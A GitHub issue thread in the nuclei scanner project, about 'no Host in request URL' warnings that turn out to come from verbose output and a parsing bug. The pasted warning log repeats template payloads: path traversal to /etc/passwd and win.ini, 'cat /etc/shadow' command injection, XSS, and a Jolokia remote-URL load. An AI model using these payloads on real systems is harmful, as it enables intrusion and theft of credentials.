Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

no Host in request URL #339

Closed
miraz1194 opened this issue Oct 5, 2020 · 8 comments · Fixed by #348
Closed

no Host in request URL #339

miraz1194 opened this issue Oct 5, 2020 · 8 comments · Fixed by #348
Labels
Priority: High After critical issues are fixed, these should be dealt with before any further issues. Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Milestone
v2.2.0

Comments

@miraz1194
Copy link

when i run neuclei find this kind of error ,
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL
@incredincomp
Copy link

Im getting this same-ish error on a couple different templates when running a list of hosts through nuclei with the -l option. All are suffering the same no host in request url, and it attempts the same empty requests until the max retry counter gets to where its set to.

@incredincomp incredincomp mentioned this issue Oct 5, 2020
Closed
@miraz1194
Copy link
Author

if u figure it out plz share with me...

@ehsandeep ehsandeep changed the title [WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL no Host in request URL Oct 5, 2020
@ehsandeep
Copy link
Member

Hey @miraz1194,

If you notice the error http: no Host in request URL it says the input is invalid. if you are using -v flag you will get info about the invalid request as well, also always make sure to follow the issue template to include base information about the issue, based on the error I assume your input is invalid, otherwise please include what command, input list you are using to reproduce this error.

cc @incredincomp

@ehsandeep ehsandeep added the Type: Question A query or seeking clarification on parts of the spec. Probably doesn't need the attention of all. label Oct 5, 2020
@incredincomp
Copy link

incredincomp commented Oct 5, 2020
edited
Loading

Hi @bauthard, thanks for the cc.

my command, mind you this is inside of a function, but

nuclei -v -json -l "$subdomain_scan_target_file" -t ./nuclei-templates/cves/ -t ./nuclei-templates/vulnerabilities/ -t ./nuclei-templates/security-misconfiguration/ -t ./nuclei-templates/generic-detections/ -t ./nuclei-templates/files/ -t ./nuclei-templates/workflows/ -t ./nuclei-templates/tokens/ -t ./nuclei-templates/dns/ -o ./deepdive/"$target_dir"-"$todate"-all-nuclei-vulns.json

and all of my errors of this kind from my script that is running right now are:

[WRN] [CVE-2019-2588] Could not execute step: could not handle http request: GET https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": http: no Host in request URL
[WRN] [CVE-2020-9484] Could not execute step: could not handle http request: GET https::8080/index.jsp giving up after 2 attempts: Get "https::8080/index.jsp": http: no Host in request URL
[WRN] [CVE-2019-7609] Could not execute step: could not handle http request: POST https::5601/api/timelion/run giving up after 2 attempts: Post "https::5601/api/timelion/run": http: no Host in request URL
[WRN] [CVE-2019-2725] Could not execute step: could not handle http request: POST https::7001/_async/AsyncResponseService giving up after 2 attempts: Post "https::7001/_async/AsyncResponseService": http: no Host in request URL
[WRN] [CVE-2018-1000129] Could not execute step: could not handle http request: GET https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html giving up after 2 attempts: Get "https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html": http: no Host in request URL
[WRN] [CVE-2020-5410] Could not execute step: could not handle http request: GET https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": http: no Host in request URL
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL
[WRN] [elasticsearch] Could not execute step: could not handle http request: GET https::9200/_all/_search giving up after 2 attempts: Get "https::9200/_all/_search": http: no Host in request URL
[WRN] [public-tomcat-instance] Could not execute step: could not handle http request: GET https::8080/manager/html giving up after 2 attempts: Get "https::8080/manager/html": http: no Host in request URL
[WRN] [exposed-kibana] Could not execute step: could not handle http request: GET https::5601/app/kibana/ giving up after 2 attempts: Get "https::5601/app/kibana/": http: no Host in request URL
[WRN] [jolokia-instance] Could not execute step: could not handle http request: GET https::8080/jolokia/version giving up after 2 attempts: Get "https::8080/jolokia/version": http: no Host in request URL
[WRN] [CVE-2019-11580] Could not execute step: could not handle http request: GET http::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "http::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": http: no Host in request URL
[WRN] [CVE-2020-8512] Could not execute step: could not handle http request: GET http::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 giving up after 2 attempts: Get "http::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22": http: no Host in request URL
[WRN] [CVE-2020-9484] Could not execute step: could not handle http request: GET http::8080/index.jsp giving up after 2 attempts: Get "http::8080/index.jsp": http: no Host in request URL
[WRN] [CVE-2019-2588] Could not execute step: could not handle http request: GET http::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "http::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": http: no Host in request URL
[WRN] [CVE-2019-7609] Could not execute step: could not handle http request: POST http::5601/api/timelion/run giving up after 2 attempts: Post "http::5601/api/timelion/run": http: no Host in request URL
[WRN] [springboot-actuators] Could not execute step: could not handle http request: GET http::8090/jolokia/list giving up after 2 attempts: Get "http::8090/jolokia/list": http: no Host in request URL
[WRN] [CVE-2019-2725] Could not execute step: could not handle http request: POST http::7001/_async/AsyncResponseService giving up after 2 attempts: Post "http::7001/_async/AsyncResponseService": http: no Host in request URL
[WRN] [CVE-2018-1000129] Could not execute step: could not handle http request: GET http::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html giving up after 2 attempts: Get "http::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html": http: no Host in request URL
[WRN] [CVE-2020-5410] Could not execute step: could not handle http request: GET http::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "http::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": http: no Host in request URL
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET http::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "http::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL
[WRN] [public-tomcat-instance] Could not execute step: could not handle http request: GET http::8080/manager/html giving up after 2 attempts: Get "http::8080/manager/html": http: no Host in request URL
[WRN] [jolokia-instance] Could not execute step: could not handle http request: GET http::8080/jolokia/version giving up after 2 attempts: Get "http::8080/jolokia/version": http: no Host in request URL
[WRN] [elasticsearch] Could not execute step: could not handle http request: GET http::9200/_all/_search giving up after 2 attempts: Get "http::9200/_all/_search": http: no Host in request URL
[WRN] [exposed-kibana] Could not execute step: could not handle http request: GET http::5601/app/kibana/ giving up after 2 attempts: Get "http::5601/app/kibana/": http: no Host in request URL
[WRN] [CVE-2019-11580] Could not execute step: could not handle http request: GET https::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "https::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": http: no Host in request URL
[WRN] [CVE-2019-2588] Could not execute step: could not handle http request: GET https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": http: no Host in request URL
[WRN] [CVE-2020-8512] Could not execute step: could not handle http request: GET https::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 giving up after 2 attempts: Get "https::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22": http: no Host in request URL
[WRN] [CVE-2020-9484] Could not execute step: could not handle http request: GET https::8080/index.jsp giving up after 2 attempts: Get "https::8080/index.jsp": http: no Host in request URL
[WRN] [CVE-2019-2725] Could not execute step: could not handle http request: POST https::7001/_async/AsyncResponseService giving up after 2 attempts: Post "https::7001/_async/AsyncResponseService": http: no Host in request URL
[WRN] [springboot-actuators] Could not execute step: could not handle http request: GET https::8090/jolokia/list giving up after 2 attempts: Get "https::8090/jolokia/list": http: no Host in request URL
[WRN] [springboot-actuators] Could not execute step: could not handle http request: GET http::8090/jolokia/list giving up after 2 attempts: Get "http::8090/jolokia/list": http: no Host in request URL
[WRN] [CVE-2019-7609] Could not execute step: could not handle http request: POST https::5601/api/timelion/run giving up after 2 attempts: Post "https::5601/api/timelion/run": http: no Host in request URL
[WRN] [CVE-2020-5410] Could not execute step: could not handle http request: GET https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": http: no Host in request URL
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL
[WRN] [CVE-2018-1000129] Could not execute step: could not handle http request: GET https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html giving up after 2 attempts: Get "https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html": http: no Host in request URL
[WRN] [public-tomcat-instance] Could not execute step: could not handle http request: GET https::8080/manager/html giving up after 2 attempts: Get "https::8080/manager/html": http: no Host in request URL
[WRN] [jolokia-instance] Could not execute step: could not handle http request: GET https::8080/jolokia/version giving up after 2 attempts: Get "https::8080/jolokia/version": http: no Host in request URL
[WRN] [elasticsearch] Could not execute step: could not handle http request: GET https::9200/_all/_search giving up after 2 attempts: Get "https::9200/_all/_search": http: no Host in request URL
[WRN] [CVE-2019-11580] Could not execute step: could not handle http request: GET https::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "https::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": http: no Host in request URL
[WRN] [exposed-kibana] Could not execute step: could not handle http request: GET https::5601/app/kibana/ giving up after 2 attempts: Get "https::5601/app/kibana/": http: no Host in request URL
[WRN] [CVE-2020-8512] Could not execute step: could not handle http request: GET https::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 giving up after 2 attempts: Get "https::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22": http: no Host in request URL
[WRN] [CVE-2020-9484] Could not execute step: could not handle http request: GET https::8080/index.jsp giving up after 2 attempts: Get "https::8080/index.jsp": http: no Host in request URL
[WRN] [CVE-2019-2588] Could not execute step: could not handle http request: GET https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": http: no Host in request URL
[WRN] [CVE-2019-2725] Could not execute step: could not handle http request: POST https::7001/_async/AsyncResponseService giving up after 2 attempts: Post "https::7001/_async/AsyncResponseService": http: no Host in request URL
[WRN] [CVE-2019-7609] Could not execute step: could not handle http request: POST https::5601/api/timelion/run giving up after 2 attempts: Post "https::5601/api/timelion/run": http: no Host in request URL
[WRN] [CVE-2018-1000129] Could not execute step: could not handle http request: GET https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html giving up after 2 attempts: Get "https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html": http: no Host in request URL
[WRN] [CVE-2020-5410] Could not execute step: could not handle http request: GET https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": http: no Host in request URL
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL
[WRN] [public-tomcat-instance] Could not execute step: could not handle http request: GET https::8080/manager/html giving up after 2 attempts: Get "https::8080/manager/html": http: no Host in request URL
[WRN] [jolokia-instance] Could not execute step: could not handle http request: GET https::8080/jolokia/version giving up after 2 attempts: Get "https::8080/jolokia/version": http: no Host in request URL
[WRN] [elasticsearch] Could not execute step: could not handle http request: GET https::9200/_all/_search giving up after 2 attempts: Get "https::9200/_all/_search": http: no Host in request URL
[WRN] [exposed-kibana] Could not execute step: could not handle http request: GET https::5601/app/kibana/ giving up after 2 attempts: Get "https::5601/app/kibana/": http: no Host in request URL
[WRN] [CVE-2019-11580] Could not execute step: could not handle http request: GET http::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "http::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": http: no Host in request URL
[WRN] [CVE-2020-8512] Could not execute step: could not handle http request: GET http::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 giving up after 2 attempts: Get "http::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22": http: no Host in request URL
[WRN] [CVE-2020-9484] Could not execute step: could not handle http request: GET http::8080/index.jsp giving up after 2 attempts: Get "http::8080/index.jsp": http: no Host in request URL
[WRN] [CVE-2019-2588] Could not execute step: could not handle http request: GET http::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "http::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": http: no Host in request URL
[WRN] [CVE-2019-7609] Could not execute step: could not handle http request: POST http::5601/api/timelion/run giving up after 2 attempts: Post "http::5601/api/timelion/run": http: no Host in request URL
[WRN] [CVE-2019-2725] Could not execute step: could not handle http request: POST http::7001/_async/AsyncResponseService giving up after 2 attempts: Post "http::7001/_async/AsyncResponseService": http: no Host in request URL
[WRN] [CVE-2018-1000129] Could not execute step: could not handle http request: GET http::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html giving up after 2 attempts: Get "http::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html": http: no Host in request URL
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET http::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "http::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL
[WRN] [CVE-2020-5410] Could not execute step: could not handle http request: GET http::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "http::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": http: no Host in request URL
[WRN] [springboot-actuators] Could not execute step: could not handle http request: GET https::8090/jolokia/list giving up after 2 attempts: Get "https::8090/jolokia/list": http: no Host in request URL
[WRN] [public-tomcat-instance] Could not execute step: could not handle http request: GET http::8080/manager/html giving up after 2 attempts: Get "http::8080/manager/html": http: no Host in request URL
[WRN] [jolokia-instance] Could not execute step: could not handle http request: GET http::8080/jolokia/version giving up after 2 attempts: Get "http::8080/jolokia/version": http: no Host in request URL
[WRN] [elasticsearch] Could not execute step: could not handle http request: GET http::9200/_all/_search giving up after 2 attempts: Get "http::9200/_all/_search": http: no Host in request URL
[WRN] [exposed-kibana] Could not execute step: could not handle http request: GET http::5601/app/kibana/ giving up after 2 attempts: Get "http::5601/app/kibana/": http: no Host in request URL
[WRN] [springboot-actuators] Could not execute step: could not handle http request: GET http::8090/jolokia/list giving up after 2 attempts: Get "http::8090/jolokia/list": http: no Host in request URL
[WRN] [springboot-actuators] Could not execute step: could not handle http request: GET https::8090/jolokia/list giving up after 2 attempts: Get "https::8090/jolokia/list": http: no Host in request URL
[WRN] [CVE-2019-11580] Could not execute step: could not handle http request: GET https::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "https::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": http: no Host in request URL
[WRN] [CVE-2020-8512] Could not execute step: could not handle http request: GET https::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 giving up after 2 attempts: Get "https::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22": http: no Host in request URL
[WRN] [CVE-2020-9484] Could not execute step: could not handle http request: GET https::8080/index.jsp giving up after 2 attempts: Get "https::8080/index.jsp": http: no Host in request URL
[WRN] [CVE-2019-2588] Could not execute step: could not handle http request: GET https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "https::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": http: no Host in request URL
[WRN] [CVE-2019-7609] Could not execute step: could not handle http request: POST https::5601/api/timelion/run giving up after 2 attempts: Post "https::5601/api/timelion/run": http: no Host in request URL
[WRN] [CVE-2019-2725] Could not execute step: could not handle http request: POST https::7001/_async/AsyncResponseService giving up after 2 attempts: Post "https::7001/_async/AsyncResponseService": http: no Host in request URL
[WRN] [CVE-2018-1000129] Could not execute step: could not handle http request: GET https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html giving up after 2 attempts: Get "https::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html": http: no Host in request URL
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "https::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL
[WRN] [CVE-2020-5410] Could not execute step: could not handle http request: GET https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "https::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": http: no Host in request URL
[WRN] [elasticsearch] Could not execute step: could not handle http request: GET https::9200/_all/_search giving up after 2 attempts: Get "https::9200/_all/_search": http: no Host in request URL
[WRN] [public-tomcat-instance] Could not execute step: could not handle http request: GET https::8080/manager/html giving up after 2 attempts: Get "https::8080/manager/html": http: no Host in request URL
[WRN] [jolokia-instance] Could not execute step: could not handle http request: GET https::8080/jolokia/version giving up after 2 attempts: Get "https::8080/jolokia/version": http: no Host in request URL
[WRN] [exposed-kibana] Could not execute step: could not handle http request: GET https::5601/app/kibana/ giving up after 2 attempts: Get "https::5601/app/kibana/": http: no Host in request URL
[WRN] [CVE-2019-11580] Could not execute step: could not handle http request: GET http::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "http::8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": http: no Host in request URL
[WRN] [springboot-actuators] Could not execute step: could not handle http request: GET https::8090/jolokia/list giving up after 2 attempts: Get "https::8090/jolokia/list": http: no Host in request URL
[WRN] [CVE-2020-8512] Could not execute step: could not handle http request: GET http::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 giving up after 2 attempts: Get "http::32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22": http: no Host in request URL
[WRN] [CVE-2020-9484] Could not execute step: could not handle http request: GET http::8080/index.jsp giving up after 2 attempts: Get "http::8080/index.jsp": http: no Host in request URL
[WRN] [CVE-2019-2588] Could not execute step: could not handle http request: GET http::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "http::9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": http: no Host in request URL
[WRN] [CVE-2019-7609] Could not execute step: could not handle http request: POST http::5601/api/timelion/run giving up after 2 attempts: Post "http::5601/api/timelion/run": http: no Host in request URL
[WRN] [CVE-2019-2725] Could not execute step: could not handle http request: POST http::7001/_async/AsyncResponseService giving up after 2 attempts: Post "http::7001/_async/AsyncResponseService": http: no Host in request URL
[WRN] [CVE-2018-1000129] Could not execute step: could not handle http request: GET http::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html giving up after 2 attempts: Get "http::8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html": http: no Host in request URL
[WRN] [CVE-2020-5410] Could not execute step: could not handle http request: GET http::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "http::8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": http: no Host in request URL
[WRN] [springboot-actuators-jolokia-xxe] Could not execute step: could not handle http request: GET http::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml giving up after 2 attempts: Get "http::8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml": http: no Host in request URL

I know for certain the list of domains being fed are clear of empty lines except maybe the last line for some reason. I can account for that on my end, I just randomly found this issue as I started noticing the errors I was seeing just now. Ill do some more looking in my recon files and make sure the file I am feeding it is clean.

Now that I am looking at that list of the errors... It looks like it may really be reading an empty line that is at the end of my domain list into the script, and then trying to send that as an input.. not sure if you could check if line is empty before submitting to the template on your end, but I will handle it on my end for my needs. Thank you!

edit ya know, maybe not an empty line... I just noticed that [WRN] [jolokia-instance] at least shows up a couple times which would mean I had multiple empty lines in my file, and that's not the case. The last line, maybe.. Others within the files are extremely unlikely though so this may not be fixed on my end with me checking my file for empty lines.

@ehsandeep
Copy link
Member

ehsandeep commented Oct 5, 2020
edited
Loading

Hi @incredincomp,

It is expected, a few things that you should know!

  1. -v flag is not meant to be used with a regular run, it should be only used only you are inspecting something, v flag includes all the information about valid/invalid/failed request but that doesn't necessarily something is wrong, same goes for this case, everything looks good here.

  2. the [WRN] messages you see, as said, if you don't use v flag you will not see them, but what are they? many templates include additional ports to check for vulnerable service but not always those ports are open, in that case nuclei can not connect them as ports are not open, as a result, you are seeing these warnings that are completely expected.

The takeaway from this, don't use -v flag with your regular use.

@incredincomp
Copy link

Epic! Thank you so much 😄

@ehsandeep
Copy link
Member

Closing this out, as this is not an issue or bug.

@ehsandeep ehsandeep mentioned this issue Oct 8, 2020
Closed
@ehsandeep
Copy link
Member

We have identified an additional issue related to this, so keeping this open until we update the code.

@ehsandeep ehsandeep reopened this Oct 9, 2020
@ehsandeep ehsandeep added Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors. Priority: High After critical issues are fixed, these should be dealt with before any further issues. and removed Type: Question A query or seeking clarification on parts of the spec. Probably doesn't need the attention of all. labels Oct 9, 2020
@ehsandeep ehsandeep added this to the 2.1.2 milestone Oct 9, 2020
@Mzack9999 Mzack9999 linked a pull request Oct 11, 2020 that will close this issue
reducing locking #348
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Priority: High After critical issues are fixed, these should be dealt with before any further issues. Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Projects
None yet
Milestone
v2.2.0
Development

Successfully merging a pull request may close this issue.

reducing locking projectdiscovery/nuclei
3 participants
@ehsandeep @incredincomp @miraz1194